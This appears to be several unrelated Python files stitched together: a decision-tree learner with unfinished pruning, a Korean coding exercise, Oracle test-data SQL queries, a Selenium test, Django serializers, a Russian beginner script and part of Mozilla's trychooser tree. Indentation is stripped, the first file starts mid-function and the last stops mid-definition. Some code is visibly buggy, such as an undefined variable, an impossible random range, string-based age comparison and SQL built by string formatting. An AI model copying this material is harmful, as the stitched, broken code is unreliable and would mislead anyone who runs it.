if self.leadingNode.leafOne:
answer = 1
else:
answer = self.testHelper(self.leadingNode.oneNode, row)
classAnswer = int(classCol.values[i])
total += 1
if(answer == classAnswer):
correct += 1
return correct/total
def testHelper(self, n, row): #todo finish
if row[n.label] == 0:
if n.leafZero:
return 0
else:
return self.testHelper(n.zeroNode, row)
elif row[n.label] == 1:
if n.leafOne:
return 1
else:
return self.testHelper(n.oneNode, row)
def postPruning(dt, l, k, valSet):
dBest = dt
tBest = dBest.test(valSet)
for i in range(l):
dPrime = dt
m = rd.randint(1, k)
for j in range(m):
n = 0 #todo n equals number of nonleaf nodes
#todo order nodes for 1 to n
p = rd.randint(1, n)
#todo make node p a leaf based on the majority of data
tPrime = dPrime.test(valSet)
if tPrime > tBest:
dBest = dPrime
return dBest #todo should return the percentage along with the tree
def entropy(matches, mismatches):
total = matches + mismatches
if total == 0:
return 0#float('nan')
first = -1 * (matches / total) * np.log2(matches / total)
second = -1 * (mismatches / total) * np.log2(mismatches / total)
return first + second
def varianceImpurity(zeroes, ones):
total = ones + zeroes
if total == 0:
return 0#float('nan')
first = ones / total
second = zeroes / total
return first * second
class node:
zeroNode = None
oneNode = None
label = None
leafZero = False
leafOne = False
zeroAnswer = -1
oneAnswer = -1
total = 0
matches = 0
mismatches = 0
matchesZero = 0
matchesOne = 0
mismatchesZero = 0
mismatchesOne = 0
def __init__(self, label):
self.label = label
def addMatchZero(self):
self.matchesZero = self.matchesZero+1
self.matches = self.matches + 1
self.total = self.total+1
def addMatchOne(self):
self.matchesOne = self.matchesOne + 1
self.matches = self.matches + 1
self.total = self.total + 1
def addMismatchZero(self):
self.mismatches = self.mismatches+1
self.mismatchesZero = self.mismatchesZero + 1
self.total = self.total+1
def addMismatchOne(self):
self.mismatches = self.mismatches+1
self.mismatchesOne = self.mismatchesOne + 1
self.total = self.total+1
def gain(self):
if self.total == 0:
return 0#float('nan')
first = entropy(self.matchesOne+self.mismatchesZero, self.matchesZero+self.mismatchesOne)
second = ((self.matchesOne+self.mismatchesOne)/self.total) * entropy(self.matchesOne, self.mismatchesOne)
third = ((self.matchesZero+self.mismatchesZero)/self.total) * entropy(self.mismatchesZero, self.matchesZero)
return first - second - third
def gainVI(self):
if self.total == 0:
return 0#float('nan')
first = varianceImpurity(self.matchesOne + self.mismatchesZero, self.matchesZero + self.mismatchesOne)
second = ((self.matchesOne+self.mismatchesOne)/self.total) * varianceImpurity(self.matchesOne, self.mismatchesOne)
third = ((self.matchesZero + self.mismatchesZero) / self.total) * varianceImpurity(self.mismatchesZero, self.matchesZero)
return first - second - third
def buildTree(trainingFileName, vOrE):
global illegal
illegal = ["Class"]
best = node("")
tf = pd.read_csv(trainingFileName)
classCol = tf[['Class']]
for key, value in tf.iteritems():
if key not in illegal:
i = 0
n = node(key)
for element in value:
element = int(element)
answer = int(classCol.values[i])
if element == answer:
if element == 0:
n.addMatchZero()
else:
n.addMatchOne()
else:
if element == 0:
n.addMismatchZero()
else:
n.addMismatchOne()
i = i+1
# print(n.label)
# print(n.matches)
# print(n.matchesZero)
# print(n.matchesOne)
# print(n.mismatches)
# print(n.mismatchesZero)
# print(n.mismatchesOne)
# print(n.total)
if vOrE == "e":
if best.label == "":
#print(n.gain())
best = n
if best.gain() < n.gain():
#print(n.gain())
best = n
else:
if best.label == "":
#print(n.gainVI())
best = n
if best.gain() < n.gain():
#print(n.gainVI())
best = n
illegal.append(best.label)
print(illegal)
print("root " + best.label)
best, best.oneNode = buildTreeHelper(trainingFileName, vOrE, best, 1)
try:
print("on of " + best.label + " is " + best.oneNode.label)
except:
0
best, best.zeroNode = buildTreeHelper(trainingFileName, vOrE, best, 0)
try:
print("zn of " + best.label + " is " + best.zeroNode.label)
except:
0
dt = decisionTree()
dt.addNode(best)
return dt
def buildTreeHelper(trainingFileName, vOrE, parent, zOrO):
global illegal
best = node("best")
n = node("")
tf = pd.read_csv(trainingFileName)
classCol = tf[['Class']]
parentDF = tf[[parent.label]]
for key, value in tf.iteritems():
# print(key)
# print(illegal)
if key not in illegal:
print(key)
i = 0
n = node(key)
for element in value:
element = int(element)
answer = int(classCol.values[i])
parentVal = int(parentDF.values[i])
if parentVal == zOrO:
if element == answer:
if element == 0:
n.addMatchZero()
else:
n.addMatchOne()
else:
if element == 0:
n.addMismatchZero()
else:
n.addMismatchOne()
i = i + 1
# print(n.label)
# print(n.matches)
# print(n.matchesZero)
# print(n.matchesOne)
# print(n.mismatches)
# print(n.mismatchesZero)
# print(n.mismatchesOne)
# print(n.total)
if vOrE == "e":
if best.label == "":
#print(n.gain())
best = n
if best.gain() < n.gain():
#print(n.gain())
best = n
else:
if best.label == "":
#print(n.gainVI())
best = n
if best.gain() < n.gain():
#print(n.gainVI())
best = n
if best.label == "best":
if zOrO == 1:
parent.leafOne = True
if parent.matchesOne > parent.mismatchesOne:
child = node("One")
else:
child = node("Zero")
else:
parent.leafZero = True
if parent.matchesZero > parent.mismatchesZero:
child = node("Zero")
else:
child = node("One")
return parent, child
modified = False
if np.isnan(entropy(best.matchesOne, best.mismatchesOne)):#entropy(best.matchesOne, best.mismatchesOne) == 0:
best.leafOne = True
if best.matchesOne > best.mismatchesOne:
best.oneNode = node("One")
else:
best.oneNode = node("Zero")
modified = True
if np.isnan(entropy(best.matchesZero, best.mismatchesZero)):#entropy(best.matchesZero, best.mismatchesZero) == 0:
best.leafZero = True
if best.matchesZero > best.mismatchesZero:
best.zeroNode = node("Zero")
else:
best.zeroNode = node("One")
modified = True
if modified:
print("return modified")
return parent, best
illegal.append(best.label)
print(illegal)
if len(illegal) >= 20:
if best.matchesZero > best.matchesOne:
best.oneNode = node("Zero")
best.leafZero = True
else:
best.oneNode = node("One")
best.leafOne = True
print("return illegal")
return parent, best
best, best.oneNode = buildTreeHelper(trainingFileName, vOrE, best, 1)
try:
print("on of " + best.label + " is " + best.oneNode.label)
except:
0
best, best.zeroNode = buildTreeHelper(trainingFileName, vOrE, best, 0)
try:
print("zn of " + best.label + " is " + best.zeroNode.label)
except:
0
print("return end")
return parent, best
#todo figure out when something should be a leaf
#todo implement pruning
|
from itertools import combinations # 조합 모듈 이용하기
# 바로 set()을 선언하고 진행해도 되지만
# 프로그래머스 json iteralize 오류 때문에 list 위주로 풀이했다.
def solution(numbers):
answer = []
# 조합 모듈 사용
result = combinations(numbers, 2)
for combination in result:
answer.append(sum(combination))
# 리스트를 집합으로 바꿔 중복을 제거 -> 다시 리스트로 바꾸어 오름차 정렬
answer = sorted(list(set(answer)))
return answer |
#! /usr/bin/env python
# -*- coding:utf-8 -*-
__author__ = 'XT'
from time import strftime
import os, sys
import random
base_dir = str(os.path.dirname(os.path.dirname(__file__)))
base_dir = base_dir.replace('\\', '/')
file_path = base_dir + "/db_fixture"
sys.path.append(file_path)
import mysql_db
from oracle_db import BD_oracle_API, BD_oracle_PZ, BD_oracle_TJ
#==== 读取 db_config.ini 文件设置 ====
base_dir = str(os.path.dirname(os.path.dirname(__file__)))
base_dir = base_dir.replace('\\', '/')
file_path = base_dir + "/db_config.ini"
import configparser as cparser
cf = cparser.ConfigParser()
cf.read(file_path)
tenthousand = cf.get("Standard_ten_thousand_number", "Section_No")
import logging
class Standard_number(BD_oracle_API):
"""docstring for Verifying_Point"""
def __init__(self, tenthousand_num=None):
super(Standard_number, self).__init__()
if tenthousand_num is None:
global tenthousand
self.tenthousand = tenthousand
else:
self.tenthousand = tenthousand_num
def Svc_num(self):
# logging.debug('This is debug message self.tenthousand : %s' % self.tenthousand)
sql = "select s.SVC_NUMBER from dbvop.svc_number s\
where s.svc_number_status='10' and s.svc_number like '%s%%'\
and rownum <=1" % self.tenthousand
# logging.debug('This is debug message sql : %s' % sql)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def Im_Icd(self):
sql = "select i.imsi,ic.ICCID from dbvop.iccid ic\
right JOIN dbvop.imsi i on i.ICCID_ID=ic.ICCID_ID and i.imsi_status='20' \
and i.ten_thousand_segment = '%s' where ic.iccid_status='10'\
and rownum <=1" % self.tenthousand
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def White_Im_Icd(self):
sql_imsi = "select imsi from dbvop.imsi i \
where i.imsi_status='10' and i.ten_thousand_segment='%s'and rownum <=1" % self.tenthousand
rep_sql_imsi = self.GetDatas_QueryDB(sql_imsi)
sql_iccid = "select to_char(ICCID) from dbvop.iccid ic where ic.iccid_status='10' \
and usim_type=1 and ic.mvno_business_mark in (select i.MVNO_BUSINESS_MARK \
from dbvop.imsi i where i.imsi_status='10' \
and i.ten_thousand_segment='%s') and rownum <=1" % self.tenthousand
rep_sql_iccid = self.GetDatas_QueryDB(sql_iccid)
return rep_sql_imsi[0][0], rep_sql_iccid[0][0]
class Verifying_Point(BD_oracle_API):
"""docstring for Verifying_Point"""
def __init__(self, timestamp):
super(Verifying_Point, self).__init__()
# timestamp 'YYYY-MM-DD hh24:mi:ss'
self.timestamp = timestamp
def Service_Order(self, mvno_service_order_no):
# 根据流水号查出service_order_id用于其他表查询
sql = "select s.service_order_id,s.mvno_user_id,s.bss_service_order_no,s.service_order_status,\
s.service_order_proc_status,to_char(s.service_order_lanch_time,'YYYY-MM-DD hh24:mi:ss' ),\
to_char(s.service_order_accept_time,'YYYY-MM-DD hh24:mi:ss'), s.service_class_code,s.user_type \
from dbvop.service_order s where mvno_service_order_no = '%s'" % mvno_service_order_no
rep_sql = self.GetDatas_QueryDB(sql)
# print rep_sql
if len(rep_sql) != 0:
self.service_order_id = rep_sql[0][0]
self.mvno_user_id = rep_sql[0][1]
return rep_sql
def order_service_inst(self):
# 依赖于Service_Order传下来的self.service_order_id
sql = "select SERVICE_INST, ACTION_TYPE, to_char(SERVICE_ORDER_LANCH_TIME,'YYYY-MM-DD hh24:mi:ss' )\
from dbvop.order_service_inst osi \
where osi.service_order_id='%s' order by SERVICE_INST " % (self.service_order_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def bss_order_service_inst(self):
sql = "select s.property_key,s.prop_action_type,s.property_value, SERVICE_INST, ACTION_TYPE, to_char(SERVICE_ORDER_LANCH_TIME,'YYYY-MM-DD hh24:mi:ss' ) \
from dbvop.bss_order_service_inst s \
where s.service_order_id='%s'" % self.service_order_id
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def order_prod_subscribe(self):
sql = "select b.product_id,b.prod_action_type,b.mvno_business_mark, to_char(SERVICE_ORDER_LANCH_TIME,'YYYY-MM-DD hh24:mi:ss' ) \
from dbvop.order_prod_subscribe b where b.service_order_id='%s' " % (self.service_order_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def order_discnt_subscribe(self):
sql = "select DISCNT_ACTION_TYPE, to_char(SERVICE_ORDER_LANCH_TIME,'YYYY-MM-DD hh24:mi:ss' ), DISCNT_ID\
from dbvop.order_discnt_subscribe a \
where a.service_order_id='%s' order by DISCNT_ID" % (self.service_order_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def service_order_back(self):
sql = "select s.service_order_push_status,s.feedback_result,\
to_char(s.bss_svc_order_cplt_time,'yyyymmdd hh24miss') \
from dbvop.service_order_back s \
where s.service_order_id='%s'" % (self.service_order_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def service_inst_subscribe(self):
sql = "select to_char(s.order_time,'yyyymmdd hh24miss'),s.service_inst_status,\
s.service_class_code,s.last_mvno_service_order_no,SERVICE_INST \
from dbvop.service_inst_subscribe s \
where s.mvno_user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def bss_inst_subscribe(self):
sql = "select b.property_key,b.property_value,SERVICE_INST,to_char(order_time,'yyyymmdd hh24miss') \
from dbvop.bss_inst_subscribe b \
where b.mvno_user_id='%s' " % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def prod_subscribe(self):
sql = "select s.product_id,to_char(s.order_time,'yyyymmdd hh24miss'),\
s.last_mvno_service_order_no,s.mvno_business_mark \
from dbvop.prod_subscribe s where s.mvno_user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def discnt_subscribe(self):
sql = "select DISCNT_ID, PROD_PACKAGE_ID from dbvop.discnt_subscribe where prod_subscribe_id=\
(select PROD_SUBSCRIBE_ID from dbvop.prod_subscribe where mvno_user_id='%s' )\
order by DISCNT_ID" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def life_Imsi(self):
sql = "select l.imsi,to_char(l.eff_date,'yyyymmdd hh24miss'),\
l.eff_flag,l.mvno_business_mark,to_char(EXP_DATE,'yyyymmdd hh24miss') \
from dbvop.life_imsi l where l.user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def Info_User(self):
sql = "select to_char(i.stop_date,'YYYYMMDD HH24MISS'),\
to_char(i.create_date,'yyyymmdd hh24miss'),VALID_FLAG,USER_STATUS,user_type\
from dbvop.info_user i where i.user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def Life_User_Product(self):
sql = "select EFF_FLAG, to_char(EFF_DATE,'YYYYMMDD HH24MISS') ,\
to_char(EXP_DATE,'YYYYMMDD HH24MISS'), to_char(CREATE_DATE,'YYYYMMDD HH24MISS')\
from dbvop.Life_User_Product l \
where l.user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def LIFE_USER_PRODUCT_DISCT(self):
sql = "select EFF_FLAG, to_char(EFF_DATE,'YYYYMMDD HH24MISS') ,\
to_char(EXP_DATE,'YYYYMMDD HH24MISS'), to_char(CREATE_DATE,'YYYYMMDD HH24MISS')\
from dbvop.LIFE_USER_PRODUCT_DISCT s \
where s.mvno_user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def I_Mvno_User_A(self):
sql = "select * from dbvop.i_mvno_user_a i\
where i.mvno_user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def q_mvno_user_a(self):
sql = "select Count(1) from dbvop.q_mvno_user_a v \
where v.mvno_user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def q_mvno_user_b(self):
sql = "select Count(1) from dbvop.q_mvno_user_b v \
where v.mvno_user_id='%s' " % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def t_mvno_user(self):
sql = "select Count(1) from dbvop.t_mvno_user v \
where v.mvno_user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def t_mvno_user_a(self):
sql = "select Count(1) from dbvop.t_mvno_user_a v \
where v.mvno_user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def t_mvno_user_b(self):
sql = "select Count(1) from dbvop.t_mvno_user_b v \
where v.mvno_user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def life_mvno_user(self):
sql = "select Count(1) from dbvop.life_mvno_user v \
where v.mvno_user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def imsi(self, imsi):
sql = "select i.imsi_status from dbvop.imsi i where i.imsi='%s'" % (ims)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def life_user(self, imsi):
sql = "select l.user_status,l.user_type,l.valid_flag,l.service_class_code,\
to_char(l.eff_date,'yyyymmdd hh24miss'),to_char(l.exp_date,'YYYYMMDD') \
from dbvop.life_user l where l.mvno_user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def BSS_order_no_mvno_mapping(self, bss_service_order_no):
sql = "select to_char(b.service_order_lanch_time,'YYYY-MM-DD hh24:mi:ss'),\
b.mvno_business_mark,b.bss_service_order_no_state \
from dbvop.BSS_order_no_mvno_mapping b \
where b.bss_service_order_no='%s'" % (bss_service_order_no)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def mvno_user(self):
sql = "select to_char(DEAL_TIME,'yyyymmdd hh24miss'), MVNO_USER_TYPE, MVNO_USER_STATUS\
from dbvop.mvno_user where mvno_user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def PAY_USER_REL(self):
sql = "select EFF_FLAG,to_char(EFF_DATE,'YYYYMMDD HH24MISS'),to_char(EXP_DATE,'YYYYMMDD HH24MISS')\
from dbvop.PAY_USER_REL where user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
def Life_User_Type(self):
sql = "select MVNO_USER_TYPE,to_char(BEGIN_TIME,'YYYYMMDD HH24MISS'),to_char(END_TIME,'YYYYMMDD HH24MISS')\
from dbvop.LIFE_USER_TYPE where mvno_user_id='%s'" % (self.mvno_user_id)
rep_sql = self.GetDatas_QueryDB(sql)
return rep_sql
if __name__ == '__main__':
# vp = Verifying_Point('YYYY-MM-DD hh24:mi:ss')
# print vp.Service_Order('123123123123')
# vp.close()
Sn = Standard_number()
print Sn.Svc_num()
print Sn.Im_Icd()
print Sn.White_Im_Icd()
Sn.close() |
from selenium.common.exceptions import NoSuchElementException
def test_add_to_cart_button_is_presence(browser):
browser.get('http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/')
try:
browser.find_element_by_css_selector('.btn.btn-lg.btn-primary.btn-add-to-basket')
except NoSuchElementException:
raise AssertionError('Did not matched')
import time; time.sleep(10)
|
from rest_framework import serializers
from film.models import origin
class originSerializers(serializers.ModelSerializer):
class Meta:
model = origin
fields = '__all__'
class originOnSerializers(serializers.ModelSerializer):
class Meta:
model = origin
fields = ['name']
|
from copy import copy
from client_states.default.device_event_serializer import \
DefaultDeviceEventSerializerState
from timeattendance.models import DeviceEventChangeRequestForCheck, DeviceEvent
class OmcDeviceEventSerializerState(DefaultDeviceEventSerializerState):
def update(self, instance, validated_data):
old_instance = copy(instance)
result = super().update(instance, validated_data)
DeviceEventChangeRequestForCheck.objects.create_from_old_and_new_events(
self.request.session.get(
'audit_user',
self.request.real_user,
),
old_instance,
result,
)
return result
|
# Поработайте с переменными, создайте несколько, выведите на экран. Запросите у пользователя некоторые числа и строки и
# сохраните в переменные, затем выведите на экран.
my_name = "Donald"
print(my_name)
my_age = 111
print(my_age)
print(float(my_age))
print(my_name, my_age)
name = input("Добрый день, введите пожалуйста своё имя: ")
print("Привет," + name)
city = input("Из какого вы города?: ")
print(f"Привет, {name}. Из города {city}.")
age = input("Сколько вам лет?: ")
if age >= "18":
print("Вам больше 18")
elif age < "18":
print("Вам меньше 18") |
#!/usr/bin/env python
"choose build options for and push to Mozilla's try server"
import sys
import re
import inspect
# A node in the decision tree
class N: # Node
def __init__ (self, prompt, help, action):
self.prompt = prompt
self.help = help
self.action = action
# this deletes a character, then moves to the next option.
class D: # delete_command
def __init__(self, next):
self.next = next
class NoPrompt:
def __init__ (self, action):
self.action = action
finish = object()
error = object()
################
# Build each node with it's data
################
a = N ("Run everything", "Run all platforms, tests and talos, and don't ask any more questions", ' -b do -p all -u all -t all')
b_od = N ("Both optimized and debug", "All builds and tests will run both on optimized and debug builds", ' -b do')
b_o = N ("Just optimized", "Only use optimized builds, do not use debug builds", ' -b o')
b_d = N ("Just debug", "Only use debug builds, do not use optimized builds", ' -b d')
p_all = N ("All platforms", "Build on all platforms", ' -p all')
p_any = NoPrompt (" -p ")
p_linux = N ("Linux", "Build on i386 (32-bit) linux", 'linux,')
p_linux64 = N ("linux64", "Build on x86-64 (64-bit) linux", 'linux64,')
p_macosx64 = N ("macosx64", "Build on Mac OSX 10.6 (x86-64, 64-bit, part of a universal binary)", 'macosx64,')
p_win32 = N ("win32", "Build on Windows (32-bit)", 'win32,')
p_win64 = N ("win64", "Build on Windows (64-bit)", 'win64,')
p_android = N ("android", "Build on Android", 'android,')
p_android_armv6 = N ("android-armv6", "Build on Android Armv6", 'android-armv6,')
p_android_noion = N ("android-noion", "Build on Android without IonMonkey", 'android-noion,')
p_emulator = N ("emulator", "Build on the B2G emulator ICS", 'emulator,')
p_emulator_jb = N ("emulator-jb", "Build on the B2G emulator JB", 'emulator-jb,')
p_emulator_kk = N ("emulator-kk", "Build on the B2G emulator KK", 'emulator-kk,')
p_none = NoPrompt (" -p none")
u_all = N ("All Unit tests", "Run all unit tests on all chosen platforms", ' -u all')
u_any = N ("Any unit tests", "Would you like to be asked about running each set of unit tests", ' -u ')
u_reftest = N ("reftest", "Run reftests", 'reftest,')
u_reftest_ipc = N ("reftest-ipc", "Run IPC reftests", 'reftest-ipc,')
u_reftest_naccel = N ("reftest-no-accel", "Run non-accelerated reftests (linux/win7 only)", 'reftest-no-accel,')
u_crashtest = N ("crashtest", "Run crashtest tests", 'crashtest,')
u_crashtest_ipc = N ("crashtest-ipc", "Run IPC crashtests", 'crashtest-ipc,')
u_xpcshell = N ("xpcshell", "Run xpcshell tests", 'xpcshell,')
u_jsreftest = N ("jsreftest", "Run jsreftests", 'jsreftest,')
u_jetpack = N ("jetpack", "Run jetpack tests", 'jetpack,')
u_marionette = N ("marionette", "Run marionette tests", 'marionette,')
u_mozmill = N ("mozmill", "Run mozmill tests (thunderbird-only)", 'mozmill,')
u_mochitests = N ("Run all mochitests", "Run all of the mochitests", 'mochitests,')
u_mochitests_any = N ("Run any mochitests", "Run any of the mochitests", '')
u_mochitest1 = N ("mochitest-1", "Run mochitest-1", 'mochitest-1,')
u_mochitest2 = N ("mochitest-2", "Run mochitest-2", 'mochitest-2,')
u_mochitest3 = N ("mochitest-3", "Run mochitest-3", 'mochitest-3,')
u_mochitest4 = N ("mochitest-4", "Run mochitest-4", 'mochitest-4,')
u_mochitest5 = N ("mochitest-5", "Run mochitest-5", 'mochitest-5,')
u_mochitestbc = N ("mochitest-bc", "Run mochitest-browser-chrome", 'mochitest-bc,')
u_mochitesto = N ("mochitest-o", "Run mochitest-o", 'mochitest-o,')
## Android only suite names
u_mochitest6 = N ("mochitest-6", "Run mochitest-6 (android-only)", 'mochitest-6,')
u_mochitest7 = N ("mochitest-7", "Run mochitest-7 (android-only)", 'mochitest-7,')
u_mochitest8 = N ("mochitest-8", "Run mochitest-8 (android-only)", 'mochitest-8,')
u_reftest1 = N ("reftest-1", "Run reftest-1 (android-only)", 'reftest-1,')
u_reftest2 = N ("reftest-2", "Run reftest-2 (android-only)", 'reftest-2,')
u_reftest3 = N ("reftest-3", "Run reftest-3 (android-only)", 'reftest-3,')
u_reftest4 = N ("reftest-4", "Run reftest-4 (android-only)", 'reftest-4,')
u_crashtest1 = N ("crashtest-1", "Run crashtest-1 (android-only)", 'crashtest-1,')
u_crashtest2 = N ("crashtest-2", "Run crashtest-2 (android-only)", 'crashtest-2,')
u_crashtest3 = N ("crashtest-3", "Run crashtest-3 (android-only)", 'crashtest-3,')
u_jsreftest1 = N ("jsreftest-1", "Run jsreftests-1 (android-only)", 'jsreftest-1,')
u_jsreftest2 = N ("jsreftest-2", "Run jsreftests-2 (android-only)", 'jsreftest-2,')
u_jsreftest3 = N ("jsreftest-3", "Run jsreftests-3 (android-only)", 'jsreftest-3,')
u_robocop1 = N ("robocop-1", "Run robocop-1 tests (android-only)", 'robocop-1,')
u_robocop2 = N ("robocop-2", "Run robocop-2 tests (android-only)", 'robocop-2,')
u_robocop3 = N ("robocop-3", "Run robocop-3 tests (android-only)", 'robocop-3,')
u_robocop4 = N ("robocop-4", "Run robocop-4 tests (android-only)", 'robocop-4,')
## B2G only suite names
u_reftest5 = N ("reftest-5", "Run reftest-5 (B2G-only)", 'reftest-5,')
u_reftest6 = N ("reftest-6", "Run reftest-6 (B2G-only)", 'reftest-6,')
u_marionette_webapi = N ("marionette-webapi", "Run marionette-webapi (B2G-only)", 'marionette-webapi,')
u_none = NoPrompt (" -u none")
t_all = N ("All talos tests", "Run all talos tests on all chosen platforms", ' -t all')
t_any = N ("Any talos tests", "Would you like to be asked about running each set of talos tests", ' -t ')
t_tpn = N ("tpn", "Run tpn suite", 'tpn,')
t_nochromer = N ("nochromer", "Run nochromer suite", 'nochromer,')
t_other = N ("other", "Run other suite", 'other,')
t_dirtypaint = N ("dirtypaint", "Run dirtypaint suite", 'dirtypaint,')
t_svgr = N ("svgr", "Run svgr suite", 'svgr,')
t_dromaeojs = N ("dromaeojs", "Run dromaeojs suite", 'dromaeojs,')
t_xperf = N ("xperf", "Run xperf suite", 'xperf,')
t_none = NoPrompt (" -t none")
remote_talos = ','.join(['remote-ts', 'remote-tdhtml', 'remote-tsvg', 'remote-tpan',
'remote-trobopan', 'remote-trobocheck', 'remote-troboprovider',
'remote-trobocheck2', 'remote-trobocheck3', 'remote-tp4m_nochrome',])
t_all_android = N ("All android talos tests", "Run all android talos tests", remote_talos)
t_any_android = N ("Any android talos tests", "Run any android talos tests", '')
t_ts_r = N ("remote-ts", "Run Android ts suite", 'remote-ts,')
t_tdhtml_r = N ("remote-tdhtml", "Run Android tdhtml suite", 'remote-tdhtml,')
t_tsvg_r = N ("remote-tsvg", "Run Android tsvg suite", 'remote-tsvg,')
t_tpan_r = N ("remote-tpan", "Run Android tpan suite", 'remote-tpan,')
t_trobopan_r = N ("remote-trobopan", "Run Android trobopan suite", 'remote-trobopan,')
t_trobocheck_r = N ("remote-trobocheck", "Run Android trobocheck suite", 'remote-trobocheck,')
t_trobocheck2_r = N ("remote-trobocheck2", "Run Android trobocheck2 suite", 'remote-trobocheck2,')
t_trobocheck3_r = N ("remote-trobocheck3", "Run Android trobocheck3 suite", 'remote-trobocheck3,')
t_troboprovider_r = N ("remote-troboprovider", "Run Android troboprovider suite", 'remote-troboprovider,')
t_nochrome_r = N ("remote-tp4m_nochrome", "Run tp4m nochrome suite", 'remote-tp4m_nochrome,')
t_none_r = NoPrompt ("")
################
# Build decision tree. Each object has a y and n property, which are chosen if
# Y or N is chosen. That property is the next question.
################
a.y = finish
a.n = b_od
b_od.y = p_all
b_od.n = b_o
b_o.y = p_all
b_o.n = b_d
b_d.y = p_all
b_d.n = error
p_all.y = u_all
p_all.n = p_any
p_any.next = p_linux
p_linux.y = p_linux64
p_linux.n = p_linux64
p_linux64.y = p_macosx64
p_linux64.n = p_macosx64
p_macosx64.y = p_win32
p_macosx64.n = p_win32
p_win32.y = p_win64
p_win32.n = p_win64
p_win64.y = p_android
p_win64.n = p_android
p_android.y = p_android_armv6
p_android.n = p_android_armv6
p_android_armv6.y = p_android_noion
p_android_armv6.n = p_android_noion
p_android_noion.y = p_emulator
p_android_noion.n = p_emulator
p_emulator.y = p_emulator_jb
p_emulator.n = p_emulator_jb
p_emulator_jb.y = p_emulator_kk
p_emulator_jb.n = p_emulator_kk
p_emulator_kk.y = D(u_all)
p_emulator_kk.n = D(u_all)
u_all.y = t_all
u_all.n = u_any
u_any.y = u_reftest
u_any.n = u_none
u_none.next = t_all
u_reftest.y = u_reftest1
u_reftest.n = u_reftest1
u_reftest1.y = u_reftest2
u_reftest1.n = u_reftest2
u_reftest2.y = u_reftest3
u_reftest2.n = u_reftest3
u_reftest3.y = u_reftest4
u_reftest3.n = u_reftest4
u_reftest4.y = u_reftest5
u_reftest4.n = u_reftest5
u_reftest5.y = u_reftest6
u_reftest5.n = u_reftest6
u_reftest6.y = u_reftest_ipc
u_reftest6.n = u_reftest_ipc
u_reftest_ipc.y = u_reftest_naccel
u_reftest_ipc.n = u_reftest_naccel
u_reftest_naccel.y = u_crashtest
u_reftest_naccel.n = u_crashtest
u_crashtest.y = u_crashtest1
u_crashtest.n = u_crashtest1
u_crashtest1.y = u_crashtest2
u_crashtest1.n = u_crashtest2
u_crashtest2.y = u_crashtest3
u_crashtest2.n = u_crashtest3
u_crashtest3.y = u_crashtest_ipc
u_crashtest3.n = u_crashtest_ipc
u_crashtest_ipc.y = u_xpcshell
u_crashtest_ipc.n = u_xpcshell
u_xpcshell.y = u_jsreftest
u_xpcshell.n = u_jsreftest
u_jsreftest.y = u_jsreftest1
u_jsreftest.n = u_jsreftest1
u_jsreftest1.y = u_jsreftest2
u_jsreftest1.n = u_jsreftest2
u_jsreftest2.y = u_jsreftest3
u_jsreftest2.n = u_jsreftest3
u_jsreftest3.y = u_jetpack
u_jsreftest3.n = u_jetpack
u_jetpack.y = u_marionette
u_jetpack.n = u_marionette
u_marionette.y = u_marionette_webapi
u_marionette.n = u_marionette_webapi
u_marionette_webapi.y = u_mozmill
u_marionette_webapi.n = u_mozmill
u_mozmill.y = u_robocop1
u_mozmill.n = u_robocop1
u_robocop1.y = u_robocop2
u_robocop1.n = u_robocop2
u_robocop2.y = u_robocop3
u_robocop2.n = u_robocop3
u_robocop3.y = u_robocop4
u_robocop3.n = u_robocop4
u_robocop4.y = u_mochitests
u_robocop4.n = u_mochitests
u_mochitests.y = D(t_all)
u_mochitests.n = u_mochitests_any
u_mochitests_any.y = u_mochitest1
u_mochitests_any.n = D(t_all)
u_mochitest1.y = u_mochitest2
u_mochitest1.n = u_mochitest2
u_mochitest2.y = u_mochitest3
u_mochitest2.n = u_mochitest3
u_mochitest3.y = u_mochitest4
u_mochitest3.n = u_mochitest4
u_mochitest4.y = u_mochitest5
u_mochitest4.n = u_mochitest5
u_mochitest5.y = u_mochitest6
u_mochitest5.n = u_mochitest6
u_mochitest6.y = u_mochitest7
u_mochitest6.n = u_mochitest7
u_mochitest7.y = u_mochitest8
u_mochitest7.n = u_mochitest8
u_mochitest8.y = u_mochitestbc
u_mochitest8.n = u_mochitestbc
u_mochitestbc.y = u_mochitesto
u_mochitestbc.n = u_mochitesto
u_mochitesto.y = D(t_all)
u_mochitesto.n = D(t_all)
